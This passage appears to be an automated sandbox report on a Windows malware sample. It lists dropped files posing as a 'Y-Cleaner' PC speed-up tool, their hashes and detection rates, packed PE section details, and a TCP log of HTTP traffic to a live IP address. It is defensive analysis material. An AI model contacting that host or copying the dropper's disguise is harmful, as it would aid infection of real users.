                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\download[1].htm

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Preview:0

                                              C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):242176
                                              Entropy (8bit):6.47050397947197
                                              Encrypted:false
                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                              C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1502720
                                              Entropy (8bit):7.646111739368707
                                              Encrypted:false
                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                              C:\Users\user\Desktop\Cleaner.lnk

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 08:49:17 2024, mtime=Fri Dec 13 08:49:17 2024, atime=Fri Dec 13 08:49:17 2024, length=1502720, window=hide
                                              Category:dropped
                                              Size (bytes):2186
                                              Entropy (8bit):3.824214360947532
                                              Encrypted:false
                                              SSDEEP:48:85LnCGPVDFlZ2RP0vjxwaPvNCgjxmgjx9Z7qgjxxEYyg:85LlFMP0vVNNrLDEYy
                                              MD5:7E0CD192896E8921626E2A96D1E3C70A
                                              SHA1:567ACBDB03FA2B2288362B843FBD7DAE1E361B24
                                              SHA-256:56EAF1F86A1A587275010A3D8506D1963B176626009BE436B6B8669132B220D0
                                              SHA-512:DEC5C0327F9E218474A279BFC4D5F246A4BD1E877CB90C00086D533D20D9982615E6C9DB4CA3A5DE891D21B2F5A681289A69E830809A896512E83B1105F2BC3B
                                              Malicious:false
                                              Preview:L..................F.@.. .....qFDM....qFDM....qFDM..........................6.:..DG..Yr?.D..U..k0.&...&.......$..S...M.{.DM...{{FDM......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.N...........................^.A.p.p.D.a.t.a...B.P.1......Y.N..Local.<......EW<2.Y.N....[.......................}.L.o.c.a.l.....N.1......Y&N..Temp..:......EW<2.Y&N....^.........................T.e.m.p.....r.1......Y&N..F0VWRU~1..Z......Y&N.Y&N..............................F.0.v.w.r.u.C.Z.S.s.W.0.e.e.e.3.v.f.e.0.....h.2......Y)N .Y-CLEA~1.EXE..L......Y)N.Y)N...........................q.Y.-.C.l.e.a.n.e.r...e.x.e.......v...............-.......u..............S.....C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.8.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.0.v.w.r.u.C.Z.S.s.W.0.e.e.e.3.v.f.e.0.\.Y.-.C.l.e.a.n.e.r...e.x.e.G.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.0.v.w.

                                              C:\Windows\appcompat\Programs\Amcache.hve

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.46843083585443
                                              Encrypted:false
                                              SSDEEP:6144:tzZfpi6ceLPx9skLmb0feZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5S:lZHteZWOKnMM6bFp9j4
                                              MD5:434DAC6F744ECB2F545A5B9662660ABA
                                              SHA1:FF0BC6D1F999A9FF01308767B4B86B0F30E3C1A4
                                              SHA-256:8B9A22D4F8B74717112C1D60537BBD6A485AF85FA6DA564ECC8973E112E61620
                                              SHA-512:741ACD3C73DD071AA7AF1BF8B9ACF13354B3CFFD98A939598D50595C133BC8301EA72E8D9812E0519C0B65173C59CDA7EDB49A3013C58F3AC56638F770351293
                                              Malicious:false
                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;.FDM..............................................................................................................................................................................................................................................................................................................................................4..r........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.934588666206335
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:1'966'080 bytes
                                              MD5:2e164f8eb316718ae1c48ed84e05dc9f
                                              SHA1:653b1c1598a62782b58e52dd3f2c53355aad94fa
                                              SHA256:323426e01a17e9974e2c710c0708a7232d250a2a7aa815ee7fdfac5f634af0e2
                                              SHA512:4c47f3284fb5220338700b8a86892184fc9956844dd041a88b47d35ebabbb4a70a3922158f02c3f40e594a74f70e6c1f929750404a2b09240535ed7d91dce4a4
                                              SSDEEP:24576:FZjVHfyt/9PRZ9j7d8t0Dls0wnohMQbqzXRqv2ZkA/35YZrPJlGmvrjynr4aAgiH:FZ9G9tfd40adoijcv6WflG4Dnr
                                              TLSH:8295335BD785854FE150CAF3E7BFCEF189115CAC4C2498232A05D33B8A7B665BB02E94
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................

                                              File Icon

                                              Icon Hash:c7a99a8aa651798c

                                              Static PE Info

                                              General

                                              Entrypoint:0xc6b000
                                              Entrypoint Section:.taggant
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                              Entrypoint Preview

                                              Instruction
                                              jmp 00007FC134925E0Ah
                                              pmaxub mm3, qword ptr [00000000h]
                                              add cl, ch
                                              add byte ptr [eax], ah
                                              add byte ptr [eax], al
                                              add byte ptr [ecx], al
                                              or al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], dh
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add bh, bh

                                              Rich Headers

                                              Programming Language:
                                              • [C++] VS2008 build 21022
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x42105a0x6e.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000x12168.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x85ed9c0x18xzazwoxl
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              0x10000x40d0000x254007497aa42cb749cd08500f4dcc9c24a8cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x40e0000x121680x94001a403e3e46490d10dd7dd5c12176d28dFalse0.962864231418919data7.889233086409241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata 0x4210000x10000x200de906030ab088402d586a76aa6666758False0.15234375data1.0884795995201089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x4220000x29a0000x200461ad3bff6e997f660f77d5f94f21ac0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              xzazwoxl0x6bc0000x1ae0000x1adc00bb6ab9a6984ea62aa320f0dbe9e820b4False0.9849476439790575data7.94137094600595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              tfoohvpc0x86a0000x10000x6008d439a733ee17a907b23751589df8344False0.58203125data5.0583485972495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .taggant0x86b0000x30000x220021ef225e44cb3f644caa1e4d329801f5False0.06675091911764706DOS executable (COM)0.7316306225023129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_CURSOR0x40e7300x130data1.0361842105263157
                                              RT_CURSOR0x40e8600x25a8DOS executable (COM, 0x8C-variant)1.0011410788381743
                                              RT_CURSOR0x410e080xea8data1.0029317697228144
                                              RT_ICON0x85edfc0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.3648720682302772
                                              RT_ICON0x85fca40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5063176895306859
                                              RT_ICON0x86054c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.5881336405529954
                                              RT_ICON0x860c140x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.619942196531792
                                              RT_ICON0x86117c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.3574108818011257
                                              RT_ICON0x8622240x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.3536885245901639
                                              RT_ICON0x862bac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.40425531914893614
                                              RT_ICON0x8630140xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.7969083155650319
                                              RT_ICON0x863ebc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8032490974729242
                                              RT_ICON0x8647640x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7350230414746544
                                              RT_ICON0x864e2c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.7774566473988439
                                              RT_ICON0x8653940x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.6827800829875519
                                              RT_ICON0x86793c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.7293621013133208
                                              RT_ICON0x8689e40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SyriacSyriac0.7594262295081967
                                              RT_ICON0x86936c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SyriacSyriac0.8111702127659575
                                              RT_DIALOG0x41c6880x84empty0
                                              RT_STRING0x41c70c0x4beempty0
                                              RT_STRING0x41cbcc0xc4empty0
                                              RT_STRING0x41cc900x732empty0
                                              RT_STRING0x41d3c40x7bcempty0
                                              RT_STRING0x41db800x5f0empty0
                                              RT_STRING0x41e1700x696empty0
                                              RT_STRING0x41e8080x7c0empty0
                                              RT_STRING0x41efc80x76aempty0
                                              RT_STRING0x41f7340x610empty0
                                              RT_GROUP_CURSOR0x41fd440x22empty0
                                              RT_GROUP_CURSOR0x41fd680x14empty0
                                              RT_GROUP_ICON0x8697d40x76dataSyriacSyriac0.6779661016949152
                                              RT_GROUP_ICON0x86984a0x68dataSyriacSyriac0.7115384615384616
                                              RT_VERSION0x8698b20x1b8COM executable for DOS0.5704545454545454
                                              RT_MANIFEST0x869a6a0x152ASCII text, with CRLF line terminators0.6479289940828402

                                              Imports

                                              DLLImport
                                              kernel32.dlllstrcpy

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              SyriacSyriac

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2024 10:48:40.165661097 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:40.285990000 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:40.286117077 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:40.287070036 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:40.407064915 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:41.645437956 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:41.645605087 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:41.700670004 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:41.822256088 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.177689075 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.177752972 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.185626030 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.305366993 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752149105 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752208948 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752243042 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752274990 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752326012 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752360106 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752381086 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752413034 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752438068 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752470016 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752492905 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752521992 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752546072 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752589941 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.752603054 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.752631903 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.760556936 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.760629892 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.760658979 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.760705948 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.766603947 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.766683102 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.766726017 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.766783953 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.872504950 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.872567892 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.944271088 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.944328070 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.944382906 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.944452047 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.946594000 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.946671009 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.946710110 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.946759939 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.954524994 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.954560041 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.954622030 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.962332964 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.962414980 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.962460041 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.962548018 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.970201969 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.970263004 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.970335960 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.970452070 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.978058100 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.978108883 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.978183031 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.978229046 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.985888958 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.985945940 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.985968113 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.986006975 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.993731022 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.993798971 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:42.993855953 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:42.994049072 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.001602888 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.001728058 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.001751900 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.001852989 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.009520054 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.009572029 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.009623051 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.009649038 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.016485929 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.016622066 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.016644955 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.016669035 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.023519039 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.023617983 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.023670912 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.023720980 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.030512094 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.030693054 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.136506081 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.136619091 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.136665106 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.136868000 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.138910055 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.138979912 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.140140057 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.140185118 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.140229940 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.140271902 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.144325018 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.144381046 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.144448996 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.144448996 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.148858070 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.148930073 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.148969889 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.149801970 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.153470993 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.153541088 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.153562069 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.153611898 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.157905102 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.157963037 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.157984972 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.158036947 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.162398100 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.162437916 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.162488937 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.162488937 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.166738033 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.166804075 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.166846037 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.167191029 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.171068907 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.171123028 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.171174049 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.171217918 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.175436974 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.175518036 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.175539970 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.175576925 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.179887056 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.179948092 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.179958105 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.179991961 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.184331894 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.184390068 CET4976180192.168.2.680.82.65.70
